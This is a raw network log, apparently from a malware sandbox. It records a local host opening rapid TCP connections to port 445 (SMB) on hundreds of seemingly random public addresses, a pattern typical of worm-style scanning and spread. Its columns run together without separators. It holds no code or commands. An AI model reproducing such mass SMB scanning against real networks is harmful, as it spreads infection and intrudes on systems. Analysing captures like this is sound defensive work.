              Oct 10, 2022 17:17:03.215308905 CEST50689445192.168.2.5151.238.61.249
              Oct 10, 2022 17:17:03.215929031 CEST50690445192.168.2.5110.117.217.45
              Oct 10, 2022 17:17:03.217022896 CEST50691445192.168.2.5220.129.76.214
              Oct 10, 2022 17:17:03.218282938 CEST50692445192.168.2.565.147.76.88
              Oct 10, 2022 17:17:03.218326092 CEST50694445192.168.2.5211.199.225.51
              Oct 10, 2022 17:17:03.218341112 CEST50693445192.168.2.573.94.1.56
              Oct 10, 2022 17:17:03.218405008 CEST50695445192.168.2.566.180.34.57
              Oct 10, 2022 17:17:03.323668957 CEST50696445192.168.2.550.102.67.212
              Oct 10, 2022 17:17:03.323848009 CEST50697445192.168.2.572.63.243.138
              Oct 10, 2022 17:17:03.402733088 CEST50698445192.168.2.522.234.11.146
              Oct 10, 2022 17:17:03.542516947 CEST50699445192.168.2.5207.211.72.55
              Oct 10, 2022 17:17:03.542648077 CEST50700445192.168.2.532.107.79.213
              Oct 10, 2022 17:17:03.634941101 CEST50701445192.168.2.5172.65.204.3
              Oct 10, 2022 17:17:03.652062893 CEST44550701172.65.204.3192.168.2.5
              Oct 10, 2022 17:17:03.652214050 CEST50701445192.168.2.5172.65.204.3
              Oct 10, 2022 17:17:03.652299881 CEST50701445192.168.2.5172.65.204.3
              Oct 10, 2022 17:17:03.669239044 CEST44550701172.65.204.3192.168.2.5
              Oct 10, 2022 17:17:03.670197010 CEST44550701172.65.204.3192.168.2.5
              Oct 10, 2022 17:17:03.713001966 CEST50702445192.168.2.5164.22.118.124
              Oct 10, 2022 17:17:03.728734016 CEST50703445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:03.744208097 CEST50704445192.168.2.5182.160.207.40
              Oct 10, 2022 17:17:03.745764017 CEST44550703172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:03.745909929 CEST50703445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:03.745958090 CEST50703445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:03.746646881 CEST50705445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:03.761738062 CEST50706445192.168.2.548.242.79.69
              Oct 10, 2022 17:17:03.763614893 CEST44550705172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:03.763751030 CEST50705445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:03.763784885 CEST50705445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:03.763812065 CEST44550703172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:03.780668020 CEST44550705172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:03.784790039 CEST44550705172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:03.901043892 CEST50707445192.168.2.5216.207.88.11
              Oct 10, 2022 17:17:03.958646059 CEST50708445192.168.2.540.177.170.234
              Oct 10, 2022 17:17:03.978988886 CEST50709445192.168.2.57.229.99.45
              Oct 10, 2022 17:17:04.078723907 CEST50710445192.168.2.578.117.146.97
              Oct 10, 2022 17:17:04.179107904 CEST50711445192.168.2.5131.92.49.206
              Oct 10, 2022 17:17:04.181682110 CEST50712445192.168.2.5182.216.159.253
              Oct 10, 2022 17:17:04.338720083 CEST50713445192.168.2.5169.239.179.68
              Oct 10, 2022 17:17:04.338732004 CEST50714445192.168.2.5113.69.244.172
              Oct 10, 2022 17:17:04.338975906 CEST50715445192.168.2.5120.39.3.180
              Oct 10, 2022 17:17:04.339273930 CEST50716445192.168.2.582.87.11.202
              Oct 10, 2022 17:17:04.339412928 CEST50717445192.168.2.5101.57.223.67
              Oct 10, 2022 17:17:04.339662075 CEST50718445192.168.2.5142.30.44.71
              Oct 10, 2022 17:17:04.339857101 CEST50719445192.168.2.5148.110.8.249
              Oct 10, 2022 17:17:04.340462923 CEST50720445192.168.2.5163.223.62.21
              Oct 10, 2022 17:17:04.341067076 CEST50721445192.168.2.5113.10.103.167
              Oct 10, 2022 17:17:04.343379021 CEST50722445192.168.2.5153.181.31.75
              Oct 10, 2022 17:17:04.343569994 CEST50724445192.168.2.583.81.103.216
              Oct 10, 2022 17:17:04.343658924 CEST50725445192.168.2.534.138.160.76
              Oct 10, 2022 17:17:04.343774080 CEST50726445192.168.2.5101.222.218.133
              Oct 10, 2022 17:17:04.344199896 CEST50723445192.168.2.582.25.31.27
              Oct 10, 2022 17:17:04.432029963 CEST50727445192.168.2.5187.211.210.120
              Oct 10, 2022 17:17:04.432215929 CEST50728445192.168.2.56.233.51.201
              Oct 10, 2022 17:17:04.525978088 CEST50729445192.168.2.572.85.41.251
              Oct 10, 2022 17:17:04.651928902 CEST50730445192.168.2.588.8.249.167
              Oct 10, 2022 17:17:04.652122021 CEST50731445192.168.2.5136.93.156.66
              Oct 10, 2022 17:17:04.891308069 CEST50732445192.168.2.5193.115.67.184
              Oct 10, 2022 17:17:04.900604010 CEST50733445192.168.2.598.72.219.191
              Oct 10, 2022 17:17:04.901036024 CEST50734445192.168.2.571.49.185.230
              Oct 10, 2022 17:17:05.026205063 CEST50735445192.168.2.5152.141.105.127
              Oct 10, 2022 17:17:05.072994947 CEST50736445192.168.2.59.44.38.96
              Oct 10, 2022 17:17:05.088990927 CEST50737445192.168.2.5203.94.173.93
              Oct 10, 2022 17:17:05.202533007 CEST50738445192.168.2.538.222.118.14
              Oct 10, 2022 17:17:05.278578043 CEST50739445192.168.2.552.16.82.76
              Oct 10, 2022 17:17:05.309673071 CEST50740445192.168.2.5134.249.20.128
              Oct 10, 2022 17:17:05.447365046 CEST50742445192.168.2.59.206.13.231
              Oct 10, 2022 17:17:05.447426081 CEST50741445192.168.2.559.188.44.45
              Oct 10, 2022 17:17:05.447597980 CEST50743445192.168.2.564.229.160.73
              Oct 10, 2022 17:17:05.447634935 CEST50744445192.168.2.5217.180.235.92
              Oct 10, 2022 17:17:05.447748899 CEST50745445192.168.2.5168.48.27.222
              Oct 10, 2022 17:17:05.447895050 CEST50746445192.168.2.5122.29.79.14
              Oct 10, 2022 17:17:05.447909117 CEST50747445192.168.2.54.76.50.236
              Oct 10, 2022 17:17:05.450887918 CEST50748445192.168.2.5198.40.250.152
              Oct 10, 2022 17:17:05.451183081 CEST50749445192.168.2.578.161.31.252
              Oct 10, 2022 17:17:05.451261044 CEST50751445192.168.2.5128.212.99.225
              Oct 10, 2022 17:17:05.451340914 CEST50752445192.168.2.524.117.116.110
              Oct 10, 2022 17:17:05.451436996 CEST50750445192.168.2.5134.68.172.94
              Oct 10, 2022 17:17:05.451459885 CEST50753445192.168.2.5211.224.83.4
              Oct 10, 2022 17:17:05.451544046 CEST50754445192.168.2.582.61.241.216
              Oct 10, 2022 17:17:05.542725086 CEST50755445192.168.2.5179.160.150.244
              Oct 10, 2022 17:17:05.542932987 CEST50756445192.168.2.536.157.198.206
              Oct 10, 2022 17:17:05.597482920 CEST44550745168.48.27.222192.168.2.5
              Oct 10, 2022 17:17:05.651197910 CEST50757445192.168.2.522.65.110.191
              Oct 10, 2022 17:17:05.775928020 CEST50758445192.168.2.5164.49.239.36
              Oct 10, 2022 17:17:05.776386023 CEST50759445192.168.2.589.50.28.64
              Oct 10, 2022 17:17:05.783112049 CEST50760445192.168.2.5159.122.126.169
              Oct 10, 2022 17:17:05.994435072 CEST50761445192.168.2.52.39.227.29
              Oct 10, 2022 17:17:06.009934902 CEST50762445192.168.2.59.32.8.225
              Oct 10, 2022 17:17:06.010047913 CEST50763445192.168.2.5217.210.124.125
              Oct 10, 2022 17:17:06.103427887 CEST50745445192.168.2.5168.48.27.222
              Oct 10, 2022 17:17:06.151187897 CEST50764445192.168.2.5144.68.184.181
              Oct 10, 2022 17:17:06.181894064 CEST50765445192.168.2.5158.33.112.122
              Oct 10, 2022 17:17:06.213296890 CEST50766445192.168.2.5148.134.178.149
              Oct 10, 2022 17:17:06.253206015 CEST44550745168.48.27.222192.168.2.5
              Oct 10, 2022 17:17:06.322741032 CEST50767445192.168.2.552.198.120.210
              Oct 10, 2022 17:17:06.387420893 CEST50768445192.168.2.541.134.226.111
              Oct 10, 2022 17:17:06.432034016 CEST50769445192.168.2.522.146.151.70
              Oct 10, 2022 17:17:06.557303905 CEST50771445192.168.2.550.118.95.45
              Oct 10, 2022 17:17:06.557317019 CEST50770445192.168.2.5192.197.120.219
              Oct 10, 2022 17:17:06.557527065 CEST50772445192.168.2.520.89.24.136
              Oct 10, 2022 17:17:06.557651043 CEST50773445192.168.2.586.198.232.130
              Oct 10, 2022 17:17:06.557792902 CEST50774445192.168.2.5160.78.29.76
              Oct 10, 2022 17:17:06.557934999 CEST50775445192.168.2.5132.200.10.169
              Oct 10, 2022 17:17:06.558248043 CEST50776445192.168.2.5139.27.4.14
              Oct 10, 2022 17:17:06.558969021 CEST50777445192.168.2.530.3.203.245
              Oct 10, 2022 17:17:06.559686899 CEST50778445192.168.2.534.123.167.78
              Oct 10, 2022 17:17:06.560651064 CEST50779445192.168.2.575.124.232.253
              Oct 10, 2022 17:17:06.561439991 CEST50780445192.168.2.5163.73.190.4
              Oct 10, 2022 17:17:06.562216043 CEST50781445192.168.2.5187.33.103.156
              Oct 10, 2022 17:17:06.563718081 CEST50782445192.168.2.5188.89.13.31
              Oct 10, 2022 17:17:06.564022064 CEST50783445192.168.2.567.74.66.48
              Oct 10, 2022 17:17:06.650707006 CEST50784445192.168.2.590.206.177.51
              Oct 10, 2022 17:17:06.650902987 CEST50785445192.168.2.589.234.240.242
              Oct 10, 2022 17:17:06.759987116 CEST50786445192.168.2.526.53.129.90
              Oct 10, 2022 17:17:06.791309118 CEST50787445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:06.808326006 CEST44550787172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:06.808537006 CEST50787445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:06.808607101 CEST50787445192.168.2.5172.65.204.4
              Oct 10, 2022 17:17:06.825551033 CEST44550787172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:06.827743053 CEST44550787172.65.204.4192.168.2.5
              Oct 10, 2022 17:17:06.885122061 CEST50788445192.168.2.5148.186.143.233
              Oct 10, 2022 17:17:06.885286093 CEST50789445192.168.2.5191.200.43.250
              Oct 10, 2022 17:17:06.885493994 CEST50790445192.168.2.5165.79.205.25
              Oct 10, 2022 17:17:06.885679960 CEST50791445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:06.902622938 CEST44550791172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:06.902834892 CEST50791445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:06.903048038 CEST50791445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:06.903477907 CEST50792445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:06.920413017 CEST44550792172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:06.920450926 CEST44550791172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:06.920521021 CEST50792445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:06.920629025 CEST50792445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:06.937807083 CEST44550792172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:06.941771984 CEST44550792172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:07.136966944 CEST50793445192.168.2.532.209.219.13
              Oct 10, 2022 17:17:07.137289047 CEST50794445192.168.2.525.172.169.64
              Oct 10, 2022 17:17:07.137397051 CEST50795445192.168.2.5211.12.133.216
              Oct 10, 2022 17:17:07.151366949 CEST44550755179.160.150.244192.168.2.5
              Oct 10, 2022 17:17:07.260061026 CEST50796445192.168.2.544.75.27.55
              Oct 10, 2022 17:17:07.307372093 CEST50797445192.168.2.5143.198.166.37
              Oct 10, 2022 17:17:07.338757992 CEST50798445192.168.2.5202.136.49.104
              Oct 10, 2022 17:17:07.447861910 CEST50799445192.168.2.5132.43.138.136
              Oct 10, 2022 17:17:07.510296106 CEST50800445192.168.2.528.2.121.103
              Oct 10, 2022 17:17:07.557827950 CEST50801445192.168.2.5159.195.152.21
              Oct 10, 2022 17:17:07.682964087 CEST50802445192.168.2.5123.109.240.19
              Oct 10, 2022 17:17:07.683969021 CEST50803445192.168.2.5142.176.247.234
              Oct 10, 2022 17:17:07.684861898 CEST50804445192.168.2.5153.76.95.242
              Oct 10, 2022 17:17:07.685704947 CEST50805445192.168.2.5166.216.89.128
              Oct 10, 2022 17:17:07.686557055 CEST50806445192.168.2.5221.104.217.66
              Oct 10, 2022 17:17:07.687463045 CEST50807445192.168.2.548.219.79.18
              Oct 10, 2022 17:17:07.688275099 CEST50808445192.168.2.5116.252.200.249
              Oct 10, 2022 17:17:07.688579082 CEST50809445192.168.2.540.1.107.3
              Oct 10, 2022 17:17:07.688806057 CEST50810445192.168.2.563.0.24.15
              Oct 10, 2022 17:17:07.688950062 CEST50811445192.168.2.5168.180.123.60
              Oct 10, 2022 17:17:07.689080954 CEST50812445192.168.2.594.178.130.43
              Oct 10, 2022 17:17:07.689390898 CEST50813445192.168.2.56.168.85.25
              Oct 10, 2022 17:17:07.689512014 CEST50814445192.168.2.561.211.46.213
              Oct 10, 2022 17:17:07.689655066 CEST50815445192.168.2.5217.79.88.97
              Oct 10, 2022 17:17:07.760318995 CEST50816445192.168.2.563.123.173.184
              Oct 10, 2022 17:17:07.760456085 CEST50817445192.168.2.5165.6.98.176
              Oct 10, 2022 17:17:07.794142962 CEST50818445192.168.2.566.33.199.2
              Oct 10, 2022 17:17:07.869637966 CEST50819445192.168.2.554.90.64.11
              Oct 10, 2022 17:17:08.025856018 CEST50820445192.168.2.5189.207.107.15
              Oct 10, 2022 17:17:08.026101112 CEST50821445192.168.2.5221.247.19.190
              Oct 10, 2022 17:17:08.026118040 CEST50822445192.168.2.513.208.90.25
              Oct 10, 2022 17:17:08.246813059 CEST50824445192.168.2.514.50.175.116
              Oct 10, 2022 17:17:08.246814966 CEST50823445192.168.2.5104.208.231.223
              Oct 10, 2022 17:17:08.246912003 CEST50825445192.168.2.5137.13.203.84
              Oct 10, 2022 17:17:08.385653019 CEST50826445192.168.2.57.127.25.65
              Oct 10, 2022 17:17:08.417198896 CEST50827445192.168.2.5142.34.135.57
              Oct 10, 2022 17:17:08.453736067 CEST50828445192.168.2.5170.187.191.216
              Oct 10, 2022 17:17:08.565819025 CEST50829445192.168.2.5136.6.121.56
              Oct 10, 2022 17:17:08.619652033 CEST50830445192.168.2.557.167.160.195
              Oct 10, 2022 17:17:08.667452097 CEST50831445192.168.2.5163.121.231.97
              Oct 10, 2022 17:17:08.794307947 CEST50832445192.168.2.53.43.121.248
              Oct 10, 2022 17:17:08.795197964 CEST50833445192.168.2.525.104.88.251
              Oct 10, 2022 17:17:08.796103001 CEST50834445192.168.2.598.12.240.89
              Oct 10, 2022 17:17:08.797370911 CEST50835445192.168.2.544.101.80.140
              Oct 10, 2022 17:17:08.798815012 CEST50836445192.168.2.5135.232.47.171
              Oct 10, 2022 17:17:08.798926115 CEST50837445192.168.2.580.246.220.32
              Oct 10, 2022 17:17:08.798935890 CEST50838445192.168.2.517.49.3.200
              Oct 10, 2022 17:17:08.799230099 CEST50839445192.168.2.5129.63.140.1
              Oct 10, 2022 17:17:08.799316883 CEST50840445192.168.2.5217.26.204.43
              Oct 10, 2022 17:17:08.799328089 CEST50841445192.168.2.5112.24.184.172
              Oct 10, 2022 17:17:08.799480915 CEST50842445192.168.2.5155.230.142.98
              Oct 10, 2022 17:17:08.800225019 CEST50843445192.168.2.548.43.167.96
              Oct 10, 2022 17:17:08.800678015 CEST50844445192.168.2.5130.212.204.245
              Oct 10, 2022 17:17:08.800753117 CEST50845445192.168.2.5122.243.79.75
              Oct 10, 2022 17:17:08.885369062 CEST50846445192.168.2.5185.200.140.27
              Oct 10, 2022 17:17:08.885502100 CEST50847445192.168.2.589.116.183.44
              Oct 10, 2022 17:17:08.904124975 CEST50848445192.168.2.5107.76.230.84
              Oct 10, 2022 17:17:08.995124102 CEST50849445192.168.2.573.177.101.151
              Oct 10, 2022 17:17:09.023632050 CEST4455084789.116.183.44192.168.2.5
              Oct 10, 2022 17:17:09.155036926 CEST50850445192.168.2.5143.239.191.175
              Oct 10, 2022 17:17:09.155235052 CEST50851445192.168.2.5141.74.121.60
              Oct 10, 2022 17:17:09.155452013 CEST50852445192.168.2.51.185.2.117
              Oct 10, 2022 17:17:09.354068041 CEST50854445192.168.2.5210.232.22.225
              Oct 10, 2022 17:17:09.354146004 CEST50853445192.168.2.5200.211.60.65
              Oct 10, 2022 17:17:09.354228973 CEST50855445192.168.2.525.163.161.108
              Oct 10, 2022 17:17:09.511101961 CEST50856445192.168.2.5117.97.1.84
              Oct 10, 2022 17:17:09.525595903 CEST50847445192.168.2.589.116.183.44
              Oct 10, 2022 17:17:09.559442043 CEST50857445192.168.2.5193.248.27.184
              Oct 10, 2022 17:17:09.573386908 CEST50858445192.168.2.5178.18.152.38
              Oct 10, 2022 17:17:09.663799047 CEST4455084789.116.183.44192.168.2.5
              Oct 10, 2022 17:17:09.682180882 CEST50859445192.168.2.5153.216.44.250
              Oct 10, 2022 17:17:09.745064974 CEST50860445192.168.2.5161.18.65.79
              Oct 10, 2022 17:17:09.791551113 CEST50861445192.168.2.5166.129.11.100
              Oct 10, 2022 17:17:09.812535048 CEST50862445192.168.2.51.207.27.56
              Oct 10, 2022 17:17:09.917536974 CEST50864445192.168.2.5175.232.67.126
              Oct 10, 2022 17:17:09.917546034 CEST50865445192.168.2.524.172.250.37
              Oct 10, 2022 17:17:09.917642117 CEST50866445192.168.2.523.65.12.117
              Oct 10, 2022 17:17:09.917808056 CEST50867445192.168.2.596.29.46.239
              Oct 10, 2022 17:17:09.917911053 CEST50868445192.168.2.571.222.198.193
              Oct 10, 2022 17:17:09.917989016 CEST50869445192.168.2.597.49.70.91
              Oct 10, 2022 17:17:09.918095112 CEST50870445192.168.2.5199.165.171.148
              Oct 10, 2022 17:17:09.918545008 CEST50871445192.168.2.566.3.172.180
              Oct 10, 2022 17:17:09.919121027 CEST50872445192.168.2.5112.133.149.153
              Oct 10, 2022 17:17:09.919666052 CEST50873445192.168.2.5170.159.229.147
              Oct 10, 2022 17:17:09.920241117 CEST50874445192.168.2.5176.20.236.26
              Oct 10, 2022 17:17:09.921067953 CEST50875445192.168.2.582.236.164.229
              Oct 10, 2022 17:17:09.921231985 CEST50876445192.168.2.5130.51.72.48
              Oct 10, 2022 17:17:09.947812080 CEST50877445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:09.968187094 CEST44550877172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:09.968436003 CEST50877445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:09.968559027 CEST50877445192.168.2.5172.65.204.5
              Oct 10, 2022 17:17:09.985383987 CEST44550877172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:09.986231089 CEST44550877172.65.204.5192.168.2.5
              Oct 10, 2022 17:17:10.010510921 CEST50878445192.168.2.595.249.121.39
              Oct 10, 2022 17:17:10.010711908 CEST50879445192.168.2.5157.107.79.31
              Oct 10, 2022 17:17:10.029232979 CEST50880445192.168.2.5214.120.155.16
              Oct 10, 2022 17:17:10.041935921 CEST50881445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:10.060342073 CEST44550881172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:10.060471058 CEST50881445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:10.060803890 CEST50881445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:10.079725981 CEST44550881172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:10.100063086 CEST50882445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:10.118834019 CEST44550882172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:10.118932962 CEST50882445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:10.118983984 CEST50882445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:10.119860888 CEST50883445192.168.2.595.208.80.34
              Oct 10, 2022 17:17:10.137629986 CEST44550882172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:10.138288021 CEST44550882172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:10.444447994 CEST50884445192.168.2.566.79.109.187
              Oct 10, 2022 17:17:10.444539070 CEST50885445192.168.2.5163.193.253.34
              Oct 10, 2022 17:17:10.444679976 CEST50886445192.168.2.5217.219.226.148
              Oct 10, 2022 17:17:10.559158087 CEST50887445192.168.2.5176.131.100.209
              Oct 10, 2022 17:17:10.559398890 CEST50888445192.168.2.5129.117.228.65
              Oct 10, 2022 17:17:10.559504986 CEST50889445192.168.2.5201.168.206.98
              Oct 10, 2022 17:17:10.620039940 CEST50890445192.168.2.572.35.127.194
              Oct 10, 2022 17:17:10.666738033 CEST50891445192.168.2.5188.139.116.109
              Oct 10, 2022 17:17:10.732487917 CEST50892445192.168.2.552.218.147.198
              Oct 10, 2022 17:17:10.839378119 CEST50893445192.168.2.5183.63.132.117
              Oct 10, 2022 17:17:10.875637054 CEST50894445192.168.2.556.246.179.41
              Oct 10, 2022 17:17:10.948637962 CEST50895445192.168.2.5100.166.215.54
              Oct 10, 2022 17:17:10.948867083 CEST50896445192.168.2.550.125.103.83
              Oct 10, 2022 17:17:11.058073044 CEST50897445192.168.2.5196.211.198.146
              Oct 10, 2022 17:17:11.058357954 CEST50898445192.168.2.5207.94.157.209
              Oct 10, 2022 17:17:11.058502913 CEST50899445192.168.2.5196.238.67.106
              Oct 10, 2022 17:17:11.058609009 CEST50900445192.168.2.5133.206.125.149
              Oct 10, 2022 17:17:11.058732986 CEST50901445192.168.2.55.212.184.105
              Oct 10, 2022 17:17:11.058845997 CEST50902445192.168.2.520.192.11.47
              Oct 10, 2022 17:17:11.058948994 CEST50903445192.168.2.5147.59.47.54
              Oct 10, 2022 17:17:11.059118986 CEST50904445192.168.2.540.142.242.79
              Oct 10, 2022 17:17:11.059786081 CEST50905445192.168.2.5176.168.237.22
              Oct 10, 2022 17:17:11.060318947 CEST50906445192.168.2.5216.246.203.6
              Oct 10, 2022 17:17:11.061028957 CEST50907445192.168.2.540.0.65.227
              Oct 10, 2022 17:17:11.061575890 CEST50908445192.168.2.5111.105.200.123
              Oct 10, 2022 17:17:11.062290907 CEST50909445192.168.2.5176.31.148.229
              Oct 10, 2022 17:17:11.063054085 CEST50910445192.168.2.5130.113.146.110
              Oct 10, 2022 17:17:11.167115927 CEST50911445192.168.2.543.105.106.11
              Oct 10, 2022 17:17:11.167316914 CEST50912445192.168.2.5142.13.115.180
              Oct 10, 2022 17:17:11.167467117 CEST50913445192.168.2.5176.49.88.195
              Oct 10, 2022 17:17:11.197834015 CEST4455090220.192.11.47192.168.2.5
              Oct 10, 2022 17:17:11.713479996 CEST50902445192.168.2.520.192.11.47
              Oct 10, 2022 17:17:11.755119085 CEST50914445192.168.2.5146.70.160.190
              Oct 10, 2022 17:17:11.852880001 CEST4455090220.192.11.47192.168.2.5
              Oct 10, 2022 17:17:11.916973114 CEST50916445192.168.2.527.149.47.108
              Oct 10, 2022 17:17:11.917135000 CEST50917445192.168.2.527.35.35.84
              Oct 10, 2022 17:17:11.917258024 CEST50918445192.168.2.525.216.250.21
              Oct 10, 2022 17:17:11.917381048 CEST50919445192.168.2.5162.7.202.248
              Oct 10, 2022 17:17:11.917623043 CEST50920445192.168.2.566.11.224.88
              Oct 10, 2022 17:17:11.917814970 CEST50921445192.168.2.5104.53.132.22
              Oct 10, 2022 17:17:11.917941093 CEST50922445192.168.2.593.146.129.242
              Oct 10, 2022 17:17:11.918061972 CEST50923445192.168.2.563.201.69.228
              Oct 10, 2022 17:17:11.918214083 CEST50924445192.168.2.5177.166.81.41
              Oct 10, 2022 17:17:11.969284058 CEST50925445192.168.2.578.187.37.10
              Oct 10, 2022 17:17:12.042618036 CEST50926445192.168.2.5106.209.114.60
              Oct 10, 2022 17:17:12.058759928 CEST50927445192.168.2.573.250.23.150
              Oct 10, 2022 17:17:12.058923006 CEST50928445192.168.2.5132.136.93.239
              Oct 10, 2022 17:17:13.242899895 CEST50929445192.168.2.559.101.183.91
              Oct 10, 2022 17:17:13.243104935 CEST50930445192.168.2.58.68.138.126
              Oct 10, 2022 17:17:13.243339062 CEST50931445192.168.2.537.175.204.113
              Oct 10, 2022 17:17:13.243451118 CEST50932445192.168.2.5159.69.158.89
              Oct 10, 2022 17:17:13.243558884 CEST50933445192.168.2.522.173.240.90
              Oct 10, 2022 17:17:13.243803978 CEST50934445192.168.2.57.48.145.253
              Oct 10, 2022 17:17:13.244031906 CEST50935445192.168.2.5171.48.140.32
              Oct 10, 2022 17:17:13.244148016 CEST50936445192.168.2.5205.140.65.7
              Oct 10, 2022 17:17:13.290692091 CEST50937445192.168.2.5119.11.23.115
              Oct 10, 2022 17:17:13.291821957 CEST50938445192.168.2.5148.163.147.171
              Oct 10, 2022 17:17:13.292601109 CEST50939445192.168.2.5168.149.66.150
              Oct 10, 2022 17:17:13.293313026 CEST50940445192.168.2.5129.101.197.174
              Oct 10, 2022 17:17:13.293992996 CEST50941445192.168.2.5161.136.111.232
              Oct 10, 2022 17:17:13.294521093 CEST50942445192.168.2.538.240.139.10
              Oct 10, 2022 17:17:13.294732094 CEST50943445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:13.311671972 CEST44550943172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:13.311770916 CEST50943445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:13.311892033 CEST50943445192.168.2.5172.65.204.6
              Oct 10, 2022 17:17:13.328660965 CEST44550943172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:13.332161903 CEST44550943172.65.204.6192.168.2.5
              Oct 10, 2022 17:17:13.354592085 CEST50944445192.168.2.5211.96.120.67
              Oct 10, 2022 17:17:13.354743004 CEST50945445192.168.2.58.185.252.51
              Oct 10, 2022 17:17:13.354861021 CEST50946445192.168.2.5105.11.44.187
              Oct 10, 2022 17:17:13.355115891 CEST50947445192.168.2.5193.109.90.136
              Oct 10, 2022 17:17:13.355262041 CEST50948445192.168.2.5116.244.145.45
              Oct 10, 2022 17:17:13.355385065 CEST50949445192.168.2.5155.76.218.121
              Oct 10, 2022 17:17:13.355664968 CEST50950445192.168.2.5142.249.216.104
              Oct 10, 2022 17:17:13.355818033 CEST50951445192.168.2.561.234.167.239
              Oct 10, 2022 17:17:13.355938911 CEST50952445192.168.2.5120.188.193.198
              Oct 10, 2022 17:17:13.356197119 CEST50953445192.168.2.5198.126.97.171
              Oct 10, 2022 17:17:13.356334925 CEST50954445192.168.2.5122.33.116.52
              Oct 10, 2022 17:17:13.356447935 CEST50955445192.168.2.5131.79.101.13
              Oct 10, 2022 17:17:13.356715918 CEST50956445192.168.2.5125.32.131.67
              Oct 10, 2022 17:17:13.356930971 CEST50958445192.168.2.5201.195.243.176
              Oct 10, 2022 17:17:13.357192993 CEST50959445192.168.2.5198.217.167.86
              Oct 10, 2022 17:17:13.357331038 CEST50960445192.168.2.581.69.169.42
              Oct 10, 2022 17:17:13.357461929 CEST50961445192.168.2.5186.196.109.228
              Oct 10, 2022 17:17:13.464015007 CEST44550938148.163.147.171192.168.2.5
              Oct 10, 2022 17:17:13.490807056 CEST50962445192.168.2.5172.65.204.7
              Oct 10, 2022 17:17:13.507694960 CEST44550962172.65.204.7192.168.2.5
              Oct 10, 2022 17:17:13.507844925 CEST50962445192.168.2.5172.65.204.7
              Oct 10, 2022 17:17:13.525793076 CEST44550962172.65.204.7192.168.2.5
              Oct 10, 2022 17:17:13.533116102 CEST50963445192.168.2.5172.65.204.7
              Oct 10, 2022 17:17:13.550272942 CEST44550963172.65.204.7192.168.2.5
              Oct 10, 2022 17:17:13.550479889 CEST50963445192.168.2.5172.65.204.7
              Oct 10, 2022 17:17:13.569464922 CEST44550963172.65.204.7192.168.2.5
              Oct 10, 2022 17:17:14.135389090 CEST50938445192.168.2.5148.163.147.171
              Oct 10, 2022 17:17:14.307641029 CEST44550938148.163.147.171192.168.2.5
              Oct 10, 2022 17:17:14.339993000 CEST50965445192.168.2.5137.121.243.167
              Oct 10, 2022 17:17:14.340490103 CEST50966445192.168.2.5172.129.219.177
              Oct 10, 2022 17:17:14.340655088 CEST50967445192.168.2.563.58.217.118
              Oct 10, 2022 17:17:14.340866089 CEST50968445192.168.2.514.105.166.15
              Oct 10, 2022 17:17:14.341195107 CEST50969445192.168.2.546.170.11.175
              Oct 10, 2022 17:17:14.341402054 CEST50970445192.168.2.5196.15.36.194
              Oct 10, 2022 17:17:14.341552019 CEST50971445192.168.2.558.109.211.179
              Oct 10, 2022 17:17:14.341689110 CEST50972445192.168.2.5126.122.173.17
              Oct 10, 2022 17:17:14.387562037 CEST50973445192.168.2.590.71.172.158
              Oct 10, 2022 17:17:14.417850018 CEST50974445192.168.2.5186.11.26.208
              Oct 10, 2022 17:17:14.418648005 CEST50975445192.168.2.5115.55.160.64
              Oct 10, 2022 17:17:14.419950008 CEST50976445192.168.2.566.170.110.138
              Oct 10, 2022 17:17:14.420742989 CEST50977445192.168.2.562.93.186.139
              Oct 10, 2022 17:17:14.421658993 CEST50978445192.168.2.5133.73.68.47
              Oct 10, 2022 17:17:14.463896036 CEST50979445192.168.2.594.226.189.209
              Oct 10, 2022 17:17:14.463918924 CEST50980445192.168.2.5220.220.250.24
              Oct 10, 2022 17:17:14.464093924 CEST50982445192.168.2.5180.217.122.195
              Oct 10, 2022 17:17:14.464098930 CEST50981445192.168.2.5148.225.31.160
              Oct 10, 2022 17:17:14.464241028 CEST50983445192.168.2.5219.144.166.159
              Oct 10, 2022 17:17:14.464302063 CEST50984445192.168.2.5196.230.219.180
              Oct 10, 2022 17:17:14.464404106 CEST50985445192.168.2.5203.206.67.35
              Oct 10, 2022 17:17:14.464584112 CEST50986445192.168.2.5194.154.188.206
